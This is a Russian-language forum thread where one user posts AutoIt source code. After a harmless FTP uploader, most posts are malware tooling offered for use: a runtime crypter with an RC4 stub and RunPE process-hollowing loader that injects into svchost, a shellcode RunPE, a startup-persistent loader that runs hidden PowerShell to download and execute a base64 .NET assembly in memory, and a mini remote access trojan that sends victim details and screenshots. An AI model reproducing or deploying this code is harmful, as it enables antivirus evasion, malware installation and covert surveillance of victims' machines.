Autoit исходники

timbo

RAM
Пользователь
Регистрация
19.09.2019
Сообщения
115
Реакции
265
Баллы
69
FTP Upload загрузка файлов по ftp

[CLIKE]
C:
#include <FTPEx.au3>
#include <Misc.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <ProgressConstants.au3>
#include <WindowsConstants.au3>
Global $sPath, $sFilename
$sServer = "ftp.mozilla.org" ; or like your ftp server this is the Mozilla ftp server.
$sUser = ""
$sPassword = ""
$hGUI = GUICreate("FTP Uploader", 320, 105, 192, 124)
$hInput = GUICtrlCreateInput("", 8, 8, 217, 21)
$hButton1 = GUICtrlCreateButton("Search File", 232, 6, 75, 25)
$hButton2 = GUICtrlCreateButton("Upload", 8, 64, 75, 25)
$hProgress = GUICtrlCreateProgress(8, 32, 297, 25)
$hLabel = GUICtrlCreateLabel("", 91, 70, 200, 25)
GUISetState(@SW_SHOW)
While 1
    $nMsg = GUIGetMsg()
    Switch $nMsg
        Case $GUI_EVENT_CLOSE
            Exit
        Case $hButton1
            _file()
        Case $hButton2
            _Upload()
    EndSwitch
WEnd
Func _file()
    $sPath = FileOpenDialog("File search", @DesktopDir)
    If @error Then Return
    GUICtrlSetData($hInput, $sPath)
    $aSplit = StringSplit($sPath, "\")
    $sFilename = $aSplit[$aSplit[0]
_Upload()
EndFunc   ;==>_file
Func _Upload()
    If $sPath = "" Then
        MsgBox(64, "Warning", "first file searching!")
        Return
    EndIf
    $sReturn = MsgBox(4, "Upload?", "File" & $sPath & " upload?")
    If $sReturn = 7 Then Return
    $hOpen = _FTP_Open("FTP.Mozilla.org")
    $hConnect = _FTP_Connect($hOpen, $sServer, $sUser, $sPassword, 1)
    If @error Then
        ProgressOff()
        MsgBox(64, "Achtung", "Fail! (Serverdata not right??)")
        _FTP_Close($hOpen)
        _FTP_Close($hConnect)
        Return
    EndIf
    _FTP_ProgressUpload($hConnect, $sPath, $sOrder&$sFilename, "_Update_Progress")
    GUICtrlSetData($hProgress, 0)
    GUICtrlSetData($hLabel, "")
    If @error Then
        ProgressOff()
        MsgBox(64, "Warning", "Fail!")
    Else
        MsgBox(64, "Info", "Upload success!")
    EndIf
    _FTP_Close($hOpen)
    _FTP_Close($hConnect)
EndFunc   ;==>_Upload
Func _Update_Progress($iProzent)
    GUICtrlSetData($hProgress, $iProzent)
    GUICtrlSetData($hLabel, "Upload at " & $iProzent & "% (stop with F8)")
    If _IsPressed("77") Then Return 0
    Return 1
EndFunc   ;==>_Update_Progress
[/CLIKE]
 

timbo

RAM
Пользователь
Регистрация
19.09.2019
Сообщения
115
Реакции
265
Баллы
69
AutoIT runtime crypter

Builder
[CLIKE]
C:
#NoTrayIcon
 ;Línea casi obligatoria en todos los scripts que hagas
;Las siguientes líneas son para el Form que se crea con Koda Designer (CTRL + M ó Tools > Koda(FormDesigner))
#include <ButtonConstants.au3>
#include <GUIConstantsEx.au3>
#include <WindowsConstants.au3>
Opt(“GUIOnEventMode”, 1)
#Region ### START Koda GUI section ### Form=D:\Programación\AutoIt\Tutoriales\[Blau] Crear un crypter\TutoCrypter\Form1.kxf
$Form1 = GUICreate(“Form1”, 187, 45, 192, 124)
GUISetOnEvent($GUI_EVENT_CLOSE, “Form1Close”)
$Button1 = GUICtrlCreateButton(“BUSCAR”, 8, 8, 75, 25)
GUICtrlSetOnEvent(-1, “Button1Click”)
$Button2 = GUICtrlCreateButton(“CIFRAR”, 96, 8, 75, 25)
GUICtrlSetOnEvent(-1, “Button2Click”)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
Local $sFilePath ;Variable donde se guardará la ruta del archivo
Local $Password = “TutoBlau” ;Contraseña que se usará para cifrar el archivo con RC4
Local $sStubPath = @ScriptDir & “\Stub.exe” ;Ruta al stub. @ScriptDir es una macro para obtener el directorio actual.
Local $Delimiter = “BLAUMOLAMUCHO” ;Delimitador
While 1 ;Bucle que mantiene el Form abierto
Sleep(100)
WEnd
Func Button1Click() ;Botón buscar
$sFilePath = FileOpenDialog(“Selecciona un archivo para cifrar”, @ScriptDir, “EXE (*.exe)”) ;Abre un diálogo para seleccionar un archivo y guardar la ruta en la variable $sFilePath
EndFunc
Func Button2Click()
Local $FileReadHandle = FileOpen($sFilePath, 0) ;Abre el archivo en modo 0 (lectura) > <!– m –><a title=”” data-original-title=”” class=”postlink” href=”[url]https://www.autoitscript.com/autoit3/docs/functions/FileOpen.htm”[/url] onclick=”window.open(this.href);return false;”>[url]https://www.autoitscript.com/autoit3/do[/url] … leOpen.htm</a><!– m –>
Local $FileRead = FileRead($FileReadHandle) ;Lee el archivo y guarda el contenido en la variable $FileRead
FileClose($FileReadHandle) ;Cierra el archivo
Local $StubReadHandle = FileOpen($sStubPath)
Local $StubRead = FileRead($StubReadHandle)
FileClose($StubReadHandle)
$FileRead = RC4($Password, $FileRead) ;Se cifra el archivo con RC4
Local $Output = $StubRead & $Delimiter & $FileRead
Local $OutputPath = FileSaveDialog(“Elige dónde guardar el archivo cifrado”, @ScriptDir, “EXE (*.exe)”, DEfault, “cifrado.exe”)
Local $FileWriteHandle = FileOpen($OutputPath, 2); Se usa el modo 2 (OVERWRITE)
FileWrite($FileWriteHandle, $Output)
FileClose($FileWriteHandle)
MsgBox(0, “¡Hecho!”, “Archivo cifrado correctamente”)
EndFunc
Func Form1Close() ;Función que se ejecutará cuando se cierre el Form
Exit(1) ;Se cierra la aplicación
EndFunc
Func RC4($key, $value) ;Función RC4
Local $S[256], $i, $j, $c, $t, $x, $y, $output
Local $keyLength = BinaryLen($key), $valLength = BinaryLen($value)
For $i = 0 To 255
$S[$i] = $i
Next
For $i = 0 To 255
$j = Mod($j + $S[$i] + Dec(StringTrimLeft(BinaryMid($key, Mod($i, $keyLength) + 1, 1), 2)), 256)
$t = $S[$i] $S[$i] = $S[$j] $S[$j] = $t
Next
For $i = 1 To $valLength
$x = Mod($x + 1, 256)
$y = Mod($S[$x] + $y, 256)
$t = $S[$x] $S[$x] = $S[$y] $S[$y] = $t
$j = Mod($S[$x] + $S[$y], 256)
$c = BitXOR(Dec(StringTrimLeft(BinaryMid($value, $i, 1), 2)), $S[$j])
$output = Binary($output) & Binary(‘0x’ & Hex($c, 2))
Next
Return $output
EndFunc
[/CLIKE]

Stub

[CLIKE]
C:
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Run_Obfuscator=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
Local $Stub ;Aquí guardaremos el contenido del stub
Local $File ;Aquí guardaremos el contenido del archivo descifrado
Local $Password = “TutoBlau” ;Contraseña para el RC4
Local $Delimitador = “BLAUMOLAMUCHO” ;Delimitador
Local $Split
Local $StubReadHandle = FileOpen(@ScriptFullPath) ;@ScriptFullPath es una macro para obtener la ruta y nombre del archivo
$Stub = FileRead($StubReadHandle)
FileClose($StubReadHandle)
$File = StringMid($Stub, StringInStr($Stub, $Delimitador) + StringLen($Delimitador)) ;Dividimos el stub a partir del delimitador
$File = RC4($Password, $File) ;Desciframos el archivo
_RunPE($File, “”, @ScriptFullPath) ;Llamamos al RunPE
Func RC4($key, $value) ;Función RC4
Local $S[256], $i, $j, $c, $t, $x, $y, $output
Local $keyLength = BinaryLen($key), $valLength = BinaryLen($value)
For $i = 0 To 255
$S[$i] = $i
Next
For $i = 0 To 255
$j = Mod($j + $S[$i] + Dec(StringTrimLeft(BinaryMid($key, Mod($i, $keyLength) + 1, 1), 2)), 256)
$t = $S[$i] $S[$i] = $S[$j] $S[$j] = $t
Next
For $i = 1 To $valLength
$x = Mod($x + 1, 256)
$y = Mod($S[$x] + $y, 256)
$t = $S[$x] $S[$x] = $S[$y] $S[$y] = $t
$j = Mod($S[$x] + $S[$y], 256)
$c = BitXOR(Dec(StringTrimLeft(BinaryMid($value, $i, 1), 2)), $S[$j])
$output = Binary($output) & Binary(‘0x’ & Hex($c, 2))
Next
Return $output
EndFunc ;==>RC4
#cs —————————————————————————-
AutoIt Version: 3.3.8.1
Author: Naker90
Script Function:
Ejecuta un archivo en memoria sin necesidad de droppearlo en el disco.
Parametros:
$byFile => Parametro que contrendra los bytes del archivo a cargar. (Retorno de la funcion “FileRead”)
$szParametros => Posibles parametros del ejecutable.
$sHost => El nombre del modulo que se va a ejecutar
Funcional en Windows 7 x64
Agradecimientos a The_Swash por haber definido los pasos a seguir para la creacion de un RunPE los cuales yo segui para realizar este codigo.
Tambien agradecer a los autores de varios RunPE que he leido para poder solucionar mis dudas, autores como: M3, Tracexx y Karcark
Recomiendo pasarle al parametro Host un ejecutable perteneciente a la carpeta “C:\Windows\SysWOW64” por ejemplo “systray.exe”
Ejemplo de Uso:
Local $File = “C:\Users\Naker90\Desktop\Anotador Naker90.exe”
Local $Read = FileRead($File)
_RunPE($Read, ”,   [MENTION=13477]system[/MENTION]Dir & “\svchost.exe”)
#ce —————————————————————————-
Func _RunPE($byFile, $szParametros, $sHost)
;Si el modulo para el createprocess es el propio ejecutable, debemos copilar antes de usar el codigo.
If $sHost = @ScriptFullPath Then
If Not @Compiled Then
MsgBox(16, ‘ERROR’, ‘Compile el script antes de utilizarlo!’)
Return 0
EndIf
EndIf
;Lo primero es crear el puntero
Local $sFileStruct = DllStructCreate(‘Byte[‘ & BinaryLen($byFile) & ‘]’)
DllStructSetData($sFileStruct, 1, $byFile)
Local $pPointer = DllStructGetPtr($sFileStruct)
;Vamos a separar el codigo en 2 partes: 1 La cabecera y 2 La memoria. De esta forma no mezclamos las cosas.
;——————————————————————
; 1.- Operaciones con la cabezera. En esta parta vamos a sacar gran parte de los datos relacionados con la cabecera que nos serviran posteriormente.
;——————————————————————
;Creamos la estructura para los datos que contiene el IMAGE_DOS_STRUCT
Local $sDOS_Struct = DllStructCreate(‘WORD e_magic;WORD e_cblp;WORD e_cp;WORD e_crlc;WORD e_cparhdr;WORD e_minalloc;WORD e_maxalloc;WORD e_ss;WORD e_sp;WORD e_csum;WORD e_ip;WORD e_cs;WORD e_lfarlc;WORD e_ovno;WORD e_res[4];WORD e_oemid;WORD e_oeminfo;WORD e_res2[10];WORD e_lfanew’, $pPointer)
;Si el archvo con tiene el “MZ” propio de los archivos ejecutables continuamos con el codigo, de lo contrario lanzamos un mensaje y retornamos 0
If DllStructGetData($sDOS_Struct, ‘e_magic’) = 23117 Then
;Le sumamos al puntero el valor de “PE/0x/0x”
$pPointer += DllStructGetData($sDOS_Struct, ‘e_lfanew’)
;Creamos la estructura IMAGE_NT_HEADER para poder utilizar posteriormente IMAGE_FILE_STRUCT y IMAGE_OPTIONAL_HEADER
Local $sNT_Struct = DllStructCreate(‘DWORD signature;CHAR IMAGE_FILE_HEADER[20];CHAR IMAGE_OPTIONAL_HEADER[224]’, $pPointer)
;Creamos la structura IMAGE_FILE_HEADER y le pasamos el puntero de elemento 2 de la structura IMAGE_NT_HEADER. De aqui vamos a sacar el numero de secciones.
Local $sFile_Struct = DllStructCreate(‘WORD Machine;WORD NumberOfSections;DWORD TimeDateStamp;DWORD PointerToSymbolTable;DWORD NumberOfSymbols;WORD SizeOfOptionalHeader;WORD Characteristics;’, DllStructGetPtr($sNT_Struct, ‘IMAGE_FILE_HEADER’))
Local $wNumberOfSection = DllStructGetData($sFile_Struct, ‘NumberOfSections’)
;Ahora vamos a crear la structura del IMAGE_OPTIONAL_HEADER de la cual sacaremos los datos de: ImageBase, SizeOfImage, EntryPoint y el SizeOfHeaders.
Local $sOptional_Struct = DllStructCreate(‘WORD magic;BYTE majorlinkerversion;BYTE minorlinkerversion;DWORD sizeofcode;DWORD sizeofinitializeddata;DWORD sizeofuninitializeddata;DWORD addressofentrypoint;DWORD baseofcode;DWORD baseofdata;DWORD imagebase;DWORD sectionalignment;DWORD filealignment;WORD majoroperatingsystemversion;WORD minoroperatingsystemversion;WORD majorimageversion;WORD minorimageversion;WORD majoresubsystemversion;WORD minorsubsystemversion;DWORD win32versionvalue;DWORD sizeofimage;DWORD sizeofheaders;DWORD checksum;WORD subsystem;WORD dllcharacteristics;DWORD sizeofstackreserve;DWORD sizeofstackcommit;DWORD sizeofheapcommit;DWORD loaderflags;DWORD numberofrvaandsizes;DOUBLE datadirectory[16]’, DllStructGetPtr($sNT_Struct, ‘IMAGE_OPTIONAL_HEADER’))
Local $dwImageBase = DllStructGetData($sOptional_Struct, ‘imagebase’)
Local $dSizeOfImage = DllStructGetData($sOptional_Struct, ‘sizeofimage’)
Local $dEntryPoint = DllStructGetData($sOptional_Struct, ‘addressofentrypoint’)
Local $dSizeOfHeaders = DllStructGetData($sOptional_Struct, ‘sizeofheaders’)
;Sumamos al puntero el tamaño del IMAGE_OPTIONAL_HEADER y 24 que es el tamaño de la IT(Import Table)
$pPointer += (DllStructGetData($sFile_Struct, ‘SizeOfOptionalHeader’) + 24)
;——————————————————————
; 2.- La Memoria. En esta parte vamos a realizar todas las operaciones con la memoria.
;——————————————————————
;Creamos las structuras StartUpInfo y ProcessInformation que luego necesitaremos para crear el proceso.
Local $sStartUpInfo = DllStructCreate(‘dword cbSize;ptr Reserved;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;dword YCountChars;dword FillAttribute;dword Flags;ushort ShowWindow;ushort Reserved2;ptr Reserved2;ptr hStdInput;ptr hStdOutput;ptr hStdError’)
Local $sProcessInfo = DllStructCreate(‘handle hProcess;handle hThread;dword dwProcessId;dword dwThreadId’)
;Lo primero es crear el proceso suspendido tirando de la API “CreateProcess”. Podemos ejecutar el proceso suspendido en nuestra propia instacia o en la de otro proceso.
Local $iCreateProcess = DllCall(‘Kernel32.dll’, ‘Bool’, ‘CreateProcessW’, ‘Wstr’, $sHost, ‘Wstr’, $szParametros, ‘Ptr’, 0, ‘Ptr’, 0, ‘Bool’, False, ‘Dword’, 4, ‘Ptr’, 0, ‘Ptr’, 0, ‘Ptr’, DllStructGetPtr($sStartUpInfo), ‘Ptr’, DllStructGetPtr($sProcessInfo))
;Obtenemos el valor del “hThread” y “hProcess” de la estructura ProcessInfo que nos servira luego para trabajar con la API “NtGetContextThread” y “VirtualAllocEx”.
Local $hThread = DllStructGetData($sProcessInfo, ‘hThread’)
Local $hProcess = DllStructGetData($sProcessInfo, ‘hProcess’)
;Limpiamos el ejecutable del proceso antes de reservar memoria, esto lo vamos a hacer con la API “NtUnmapViewOfSection”
Local $iUnMapSection = DllCall(‘Ntdll.dll’, ‘Int’, ‘NtUnmapViewOfSection’, ‘Ptr’, $hProcess, ‘Ptr’, $dwImageBase)
;Obtenemos los contextos (Registros) con la estructura CONTEXT y establecemos la bandera con el valor 0x10007
Local $sContext_Struct = DllStructCreate(‘dword ContextFlags;dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;dword SegGs; dword SegFs; dword SegEs; dword SegDs;dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;byte ExtendedRegisters[512]’)
DllStructSetData($sContext_Struct, 1, 0x10007)
;Obtenemos el context con la API “GetContextThread”
Local $iGetContextThread = DllCall(‘Kernel32.dll’, ‘Int’, ‘GetThreadContext’, ‘Handle’, $hThread, ‘Ptr’, DllStructGetPtr($sContext_Struct))
;Reservamos memoria con VirtualAllocEx
Local $pVirtualAlloc = DllCall(‘Kernel32.dll’, ‘Ptr’, ‘VirtualAllocEx’, ‘Handle’, $hProcess, ‘Ptr’, $dwImageBase, ‘Dword’, $dSizeOfImage, ‘Dword’, 0x3000, ‘Dword’, 0x40)
;Escribimos en el proceso la cabecera.
Local $iWriteProcessFirst = DllCall(‘Kernel32.dll’, ‘Int’, ‘WriteProcessMemory’, ‘Handle’, $hProcess, ‘Ptr’, $dwImageBase, ‘Ptr’, DllStructGetPtr($sDOS_Struct), ‘Ulong_Ptr’, $dSizeOfHeaders, ‘Dword’, 0)
;Escribimos las cabeceras en la memoria que acabamos de reservar.
For $i = 1 To $wNumberOfSection
;Creamos la estructura para las secciones. En este momento nos encontramos en la primera seccion.
Local $sSection_Struct = DllStructCreate(‘char Name[8];dword UnionOfVirtualSizeAndPhysicalAddress;dword VirtualAddress;dword SizeOfRawData;dword PointerToRawData;dword PointerToRelocations;dword PointerToLinenumbers;ushort NumberOfRelocations;ushort NumberOfLinenumbers;dword Characteristics’, $pPointer)
;Obtenemos los datos de las seccion necesarios para escribirlos en memoria
Local $dVirtualAddress = ($dwImageBase + DllStructGetData($sSection_Struct, ‘VirtualAddress’))
Local $dSizeOfRawData = DllStructGetData($sSection_Struct, ‘SizeOfRawData’)
Local $dPointerToRawData = (DllStructGetPtr($sDOS_Struct) + DllStructGetData($sSection_Struct, ‘PointerToRawData’))
;Escribimos los datos con “WriteProcessMemory”
Local $iWriteProcessSecond = DllCall(‘Kernel32.dll’, ‘Int’, ‘WriteProcessMemory’, ‘Handle’, $hProcess, ‘Ptr’, $dVirtualAddress, ‘Ptr’, $dPointerToRawData, ‘Ulong_Ptr’, $dSizeOfRawData, ‘Dword’, 0)
;Le sumamos al puntero 40 que es el valor de la estructutura IMAGE_SECTION_HEADER entera.
$pPointer += 40
Next
;Modificamos el EntryPoint sumandole al actual el valor del ImageBase.
Local $dModEntryPoint = $dwImageBase + $dEntryPoint
DllStructSetData($sContext_Struct, ‘Eax’, $dModEntryPoint)
;Modificamos EBX + 8 por el ImageBase del ejecutable a cargar.
Local $dNewEBX = (DllStructGetData($sContext_Struct, ‘Ebx’) + 8)
Local $iWriteVirtualMemory = DllCall(‘Kernel32.dll’, ‘Int’, ‘WriteProcessMemory’, ‘Handle’, $hProcess, ‘Ptr’, $dNewEBX, ‘Ptr*’, $dwImageBase, ‘Ulong_Ptr’, 4, ‘Dword’, 0)
;Le asignamos al proceso los regsitros con la API “SetThreadContext” y luego arrancamos el proceso con “ResumeThread”.
Local $iSetThread = DllCall(‘Kernel32.dll’, ‘Int’, ‘SetThreadContext’, ‘Handle’, $hThread, ‘Ptr’, DllStructGetPtr($sContext_Struct))
Local $dResume = DllCall(‘Kernel32.dll’, ‘Dword’, ‘ResumeThread’, ‘Handle’, $hThread)
Else
MsgBox(16, ‘ERROR’, ‘Este archivo no es un ejecutable!’)
Return 0
EndIf
EndFunc ;==>_RunPE
[/CLIKE]
 

timbo

RAM
Пользователь
Регистрация
19.09.2019
Сообщения
115
Реакции
265
Баллы
69
RunExeFromMemory (ShellCode RunPe)


[CLIKE]
C:
Local $sBinary = FileOpenDialog("Elija tu Servidor para Ejecutar en la Memoria", "", "Archivos exe (*.exe)")

Call ( RunExeFromMemory(Fileread($sBinary)))
Func RunExeFromMemory($Binary)

    Global $Memory ,  $FileBuffer

    $Memory = DllStructCreate("Boolean[" & sReadBytes(sShellCode()) & "]")
    $FileBuffer = DllStructCreate("Boolean[" & sReadBytes($Binary) & "]")
    DllStructSetData($Memory, 1, sShellRead(sShellCode()))
    DllStructSetData($FileBuffer, 1, $Binary)

    Call ( CWPA( sStructBuffer(), sInjectMyApp(), sStructBin(), False, False ))

EndFunc
Func sStructBuffer()

    Local $Ret = DllStructGetPtr($Memory)
    Return $Ret

EndFunc
Func sStructBin()

    Local $Ret2 = DllStructGetPtr($FileBuffer)
    Return $Ret2

EndFunc
Func CWPA($lpPrevWndFunc, $hWnd, $Msg, $wParam, $lParam)

    Local $Return
    $Return = DllCall("User32", "none", "CallWindowProcA", "ptr", $lpPrevWndFunc, "wstr", $hWnd, "ptr", $Msg, "int", $wParam, "int", $lParam)

EndFunc
Func sInjectMyApp()

    Local $sInject = @SystemDir & "\svchost.exe"
    Return $sInject

EndFunc

Func sShellCode ()

   Local $Buffer
         $Buffer = "0x" & "3078363045383445303030303030364230303635303037323030364530303635303036433030333330303332303030303030364530303734303036343030364" & _
    "33030364330303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030" & _
    "30303030303030303030303030303030303030303030303030303030303030303542384246433641343245384242303330303030384235343234323838393131384235343234324336413" & _
    "34545384141303330303030383931313641344145384131303330303030383933393641314536413343453839443033303030303641323236384634303030303030453839313033303030" & _
    "30364132363641323445383838303330303030364132413641343045383746303330303030364132453641304345383736303330303030364133323638433830303030303045383641303" & _
    "33030303036413241453835433033303030303842303943373031343430303030303036413132453834443033303030303638354245383134434635314538373930333030303036413345" & _
    "45383342303330303030384244313641314545383332303330303030364134304646333246463331464644303641313245383233303330303030363835424538313443463531453834463" & _
    "03330303030364131454538313130333030303038423039384235313343364133454538303530333030303038423339303346413641323245384641303230303030384230393638463830" & _
    "30303030303537353146464430364130304538453830323030303036383838464542333136353145383134303330303030364132454538443630323030303038423339364132414538434" & _
    "43032303030303842313136413432453843343032303030303537353236413030364130303641303436413030364130303641303036413030464633314646443036413132453841393032" & _
    "30303030363844303337313046323531453844353032303030303641323245383937303230303030384231313641324545383845303230303030384230394646373233344646333146464" & _
    "43036413030453837453032303030303638394339353141364535314538414130323030303036413232453836433032303030303842313138423339364132454538363130323030303038" & _
    "42303936413430363830303330303030304646373235304646373733344646333146464430364133364538343730323030303038424431364132324538334530323030303038423339364" & _
    "13345453833353032303030303842333136413232453832433032303030303842303136413245453832333032303030303842303935324646373735343536464637303334464633313641" & _
    "30304538313030323030303036384131364133444438353145383343303230303030383343343043464644303641313245384639303130303030363835424538313443463531453832353" & _
    "03230303030364132324538453730313030303038423131383343323036364133414538444230313030303036413032353235314646443036413336453843453031303030304337303130" & _
    "30303030303030423832383030303030303641333645384243303130303030463732313641314545384233303130303030384231313842353233433831433246383030303030303033443" & _
    "03641334545383946303130303030303331313641323645383936303130303030364132383532464633313641313245383841303130303030363835424538313443463531453842363031" & _
    "30303030383343343043464644303641323645383733303130303030384233393842303938423731313436413345453836353031303030303033333136413236453835433031303030303" & _
    "84230393842353130433641323245383530303130303030384230393033353133343641343645383434303130303030384243313641324545383342303130303030384230393530464637" & _
    "37313035363532464633313641303045383241303130303030363841313641334444383531453835363031303030303833433430434646443036413336453831333031303030303842313" & _
    "13833433230313839313136413341453830353031303030303842303933424341304638353333464646464646364133324538463430303030303038423039433730313037303030313030" & _
    "36413030453845353030303030303638443243374137363835314538313130313030303036413332453844333030303030303842313136413245453843413030303030303842303935324" & _
    "64637313034464644303641323245384242303030303030384233393833433733343641333245384146303030303030384233313842423641343030303030303833433630383641324545" & _
    "38394430303030303038423131364134364538393430303030303035313641303435373536464633323641303045383836303030303030363841313641334444383531453842323030303" & _
    "03030383343343043464644303641323245383646303030303030384230393842353132383033353133343641333245383630303030303030384230393831433142303030303030303839" & _
    "31313641303045383446303030303030363844334337413745383531453837423030303030303641333245383344303030303030384244313641324545383334303030303030384230394" & _
    "64633324646373130344646443036413030453832343030303030303638383833463441394535314538353030303030303036413245453831323030303030303842303946463731303446" & _
    "46443036413441453830343030303030303842323136314333384243423033344332343034433336413030453846324646464646463638353443414146393135314538314530303030303" & _
    "03641343036383030313030303030464637343234313836413030464644304646373432343134453843464646464646463839303138334334313043334538323230303030303036384134" & _
    "34453045454335304538344230303030303038334334303846463734323430344646443046463734323430383530453833383030303030303833433430384333353535323531353335363" & _
    "53733334330363438423730333038423736304338423736314338423645303838423745323038423336333834373138373546333830334636423734303738303346344237343032454245" & _
    "37384243353546354535423539354135444333353535323531353335363537384236433234314338354544373434333842343533433842353432383738303344353842344131383842354" & _
    "13230303344444533333034393842333438423033463533334646333343304643414338344330373430374331434630443033463845424634334237433234323037354531384235413234" & _
    "3033444436363842304334423842354131433033444438423034384230334335354635453542353935413544433343333030303030303030"

    Return $Buffer

EndFunc
Func sShellRead($sData)

    Local $sValue

    For $i = 1 To sReadBytes($sData)
        $sValue &= Chr(sValue(BinaryMid($sData , $i , 1)))
    Next

    Return $sValue
EndFunc
Func sReadBytes($Data)

    Local $Value = BinaryLen($Data)
    Return $Value

EndFunc
Func sValue($Value)

    Local $Result = Execute($Value)
    Return Number($Result)

EndFunc
[/CLIKE]
 

timbo

RAM
Пользователь
Регистрация
19.09.2019
Сообщения
115
Реакции
265
Баллы
69
Loader файлов

[CLIKE]
C:
#NoTrayIcon


For $i = 30 To 1 Step -1
    Sleep(1000)
Next

If Not FileExists(@StartupDir & "/" & "nyan.exe") Then
  FileCopy(@ScriptFullPath, @StartupDir, 1)
EndIf

RunWait("cmd /c start /b powershell -noexit -exec bypass -window 1 " & _
"$web = New-Object System.Net.WebClient;" & _
"$string = $web.Downloadstring('http://ваша ссылка/');" & _
"$assembly = [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String(-join $string[-1..-$string.Length]));" & _
"$methodInfo = $assembly.EntryPoint; $create = $assembly.CreateInstance($methodInfo.Name);" & _
"$methodInfo.Invoke($create,$null) & exit", @SystemDir, @SW_HIDE)
[/CLIKE]
 
Последнее редактирование:

timbo

RAM
Пользователь
Регистрация
19.09.2019
Сообщения
115
Реакции
265
Баллы
69
Mini Rat Autoit

Client

[CLIKE]
C:
#Region ### START Koda GUI section ### Form=
$Form1_1 = GUICreate("Level-23 Mini Rat Autoit", 693, 265, -1, -1)
$ListView1 = GUICtrlCreateListView("Name|IP|User|Os|Sys|Ver", 288, 8, 393, 241)
GUICtrlSendMsg(-1, $LVM_SETCOLUMNWIDTH, 0, 50)
GUICtrlSendMsg(-1, $LVM_SETCOLUMNWIDTH, 1, 50)
GUICtrlSendMsg(-1, $LVM_SETCOLUMNWIDTH, 2, 50)
GUICtrlSendMsg(-1, $LVM_SETCOLUMNWIDTH, 3, 50)
GUICtrlSendMsg(-1, $LVM_SETCOLUMNWIDTH, 4, 50)
GUICtrlSendMsg(-1, $LVM_SETCOLUMNWIDTH, 5, 50)
Local $999
$Pic1 = GUICtrlCreatePic("", 8, 8, 273, 241)
$buttoncontext = GUICtrlCreateContextMenu($ListView1)
$msg = GUICtrlCreateMenuItem("Send Message", $buttoncontext)
$Desktop = GUICtrlCreateMenuItem("Photo Capture", $buttoncontext)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###



TCPStartup ()

$r=TCPListen ("0.0.0.0","1337",200)


Do
If GUIGetMsg() = $GUI_EVENT_CLOSE Then Exit

   $b=TCPAccept ($r)

 Until    $b <> -1


While 1


$nMsg =    GUIGetMsg()
Switch $nMsg
    Case $GUI_EVENT_CLOSE
        Exit
        Case $msg

TCPSend    ($b,"msg")

    Case $Desktop

    FileDelete  [MENTION=7239]Temp[/MENTION]dir&"\Mr.888.jpg")

    TCPSend    ($b,"Screen")

EndSwitch

$uu=TCPRecv ($b,23240 * 23240)


If $uu <> "" AND  StringRight ($uu , 4) <> "beta" Then



FileWrite   [MENTION=7239]Temp[/MENTION]dir&"\Mr.888.jpg",$uu)

GUICtrlSetImage ($Pic1  [MENTION=7239]Temp[/MENTION]dir&"\Mr.888.jpg")

EndIf

If StringRight ($uu , 4)="beta" Then
TrayTip ("Mr.888 Rat","Beta",5)

GUICtrlCreateListViewItem ($uu,$ListView1)

EndIf


WEnd
[/CLIKE]

Server

[CLIKE]
C:
#include


TCPStartup ()

Global $r


While 1


$1=TCPNameToIP ("127.0.0.1")

$r=TCPConnect ($1,"1337")



TCPSend ($r ,"victim"&"|"&"X"&"|"&@UserName&"|"&@OSVersion&"|"&@OSArch&"|"&"beta")

If   [MENTION=8708]error[/MENTION] Then ContinueLoop

Sleep (1)


While 1

Sleep (1)


$uu=TCPRecv ($r,10240 * 10240)


If $uu = "msg" Then

MsgBox (0,'',"Hacked")

EndIf


If $uu = "Screen" Then



_ScreenCapture_SetJPGQuality (8)
_ScreenCapture_Capture  [MENTION=7239]Temp[/MENTION]dir&"\888.jpg")

Sleep (1)

$1=FileOpen   [MENTION=7239]Temp[/MENTION]dir&"\888.jpg")
$2=FileRead ($1)
FileClose($1)

TCPSend ($r,$2)


EndIf



WEnd


WEnd
[/CLIKE]
 

Daniel_FUD

floppy-диск
Пользователь
Регистрация
26.04.2020
Сообщения
4
Реакции
0
Баллы
2
Telegram
Не плохой выбор у вас
Спасибо !
 

H83Kjsoi2109l

floppy-диск
Пользователь
Регистрация
20.05.2020
Сообщения
2
Реакции
0
Баллы
1
Сканер:
#include <ListViewConstants.au3>
#include <GuiListView.au3>
#include <GUIConstantsEx.au3>
#include <Constants.au3>
 
Верх